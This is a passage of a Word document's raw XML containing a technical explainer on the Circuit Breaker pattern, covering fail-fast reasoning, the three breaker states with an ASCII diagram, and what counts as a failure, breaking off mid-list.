      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A fast failure is recoverable. A slow failure cascades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6DB27" w14:textId="77777777" w:rsidR="006E6644" w:rsidRDefault="006E6644" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="3A6D0E7B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker Pattern in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1608D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What the Circuit Breaker Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71A8DB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The Circuit Breaker is a stability pattern that prevents a system from repeatedly attempting an operation that is likely to fail, thereby protecting both the caller (from wasting resources waiting) and the callee (from being overwhelmed while struggling to recover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667DD21" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The analogy to electrical circuit breakers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B39B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>An electrical circuit breaker detects excessive current (a fault) and OPENS the circuit (stops current flow) to prevent damage (house fire). Once the problem is fixed, you manually reset the breaker. The software circuit breaker works the same way — detects excessive failures, stops making calls, and periodically tests whether the downstream has recovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23011B23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The Circuit Breaker is not just about "stopping calls to a dead service." It's a fundamental mechanism for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7ACD67" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail fast</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — return errors immediately instead of waiting for timeouts (which are MUCH more expensive than immediate failures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E26D165" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevent cascade failure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — one failing dependency doesn't consume all resources and take down the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BD59B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Give the struggling service breathing room</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — stop sending traffic so it can recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E3A7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Provide predictable degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — the system degrades gracefully with a known behavior rather than collapsing unpredictably.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219649BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why timeouts alone are insufficient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97CC53" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Consider a service calling a downstream that's unresponsive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63865EDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>With timeout only (5 seconds): Each request blocks a thread for 5 seconds before failing. Under load (1000 RPS), 5000 threads are blocked simultaneously → thread pool exhausted → caller is now also down → cascade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F27F3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>With Circuit Breaker: After detecting the downstream is failing, ALL subsequent requests fail immediately (&lt; 1ms) → threads are freed → caller remains healthy → only the affected functionality is degraded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607DBB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost of a timeout vs. the cost of a circuit breaker rejection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683E64D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26D904" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Timeout failure:     5,000ms of thread/connection blocked + 5,000ms of user waiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660150B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker:     &lt; 1ms to return failure + immediate fallback response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F140F60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Ratio:               5,000x cheaper to fail fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EC18C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="41317CA7">
          <v:rect id="_x0000_i4243" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1873F260" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Three States — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33261089" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 State Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655326F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C9DEC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  ┌─────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C33928" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7485E0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │     Failure threshold exceeded                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D40D41E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16528C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         ┌───────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269A1EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                 │      Timeout expires      │                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975A524" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │     CLOSED      │ ─────────────────────────&gt;│       OPEN            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514D17B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │  (normal flow)  │                           │  (requests rejected)  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1593A5D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                 │                           │                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D10B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         └───────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138691B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C903E5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B57AC9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │     Probe request succeeds                    │ Timeout expires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134344E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │                                               │ (recovery window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC77285" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  │                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10813E86" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │          ┌──────────────────────┐             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494844DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  │          │                      │             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486B63D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  └──────────│     HALF-OPEN        │&lt;────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A27D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                             │  (testing recovery)  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7294F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                             │                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8C38B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                             └──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A29179" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3B109" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                        │ Probe request fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459B9DA1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB10E3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                        └──────────────&gt; Back to OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C3C7C8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 CLOSED State — Normal Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D40C1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E180CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All requests pass through to the downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1781F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker monitors every response (success or failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1580B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Maintains a rolling count/window of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB4EC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>System is healthy — no intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E09E549" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal tracking (what the circuit breaker maintains):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADF5CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC13AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>State: CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B3834" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure counter: 3 (out of last 100 requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7D565" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Success counter: 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39824781" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure rate: 3% (below threshold of 50%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDE219" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Window: sliding window of last 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7C8CE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transition trigger to OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F33A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When the failure rate exceeds the configured threshold within the measurement window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD0C3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="984"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Example: "If more than 50% of requests in the last 10 seconds fail, trip the breaker."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB957E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What counts as a "failure":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362DCFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP 5xx responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4A410" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Connection timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6BE99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AC3AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Read timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611CAB8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Exception/error from downstream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639ACCE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Response time exceeding a configured threshold (slow calls treated as failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2E45A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What does NOT count as failure (configurable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF19E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP 4xx (client errors — the downstream is working correctly, the request was bad)</w:t>
      </w:r>
    </w:p>
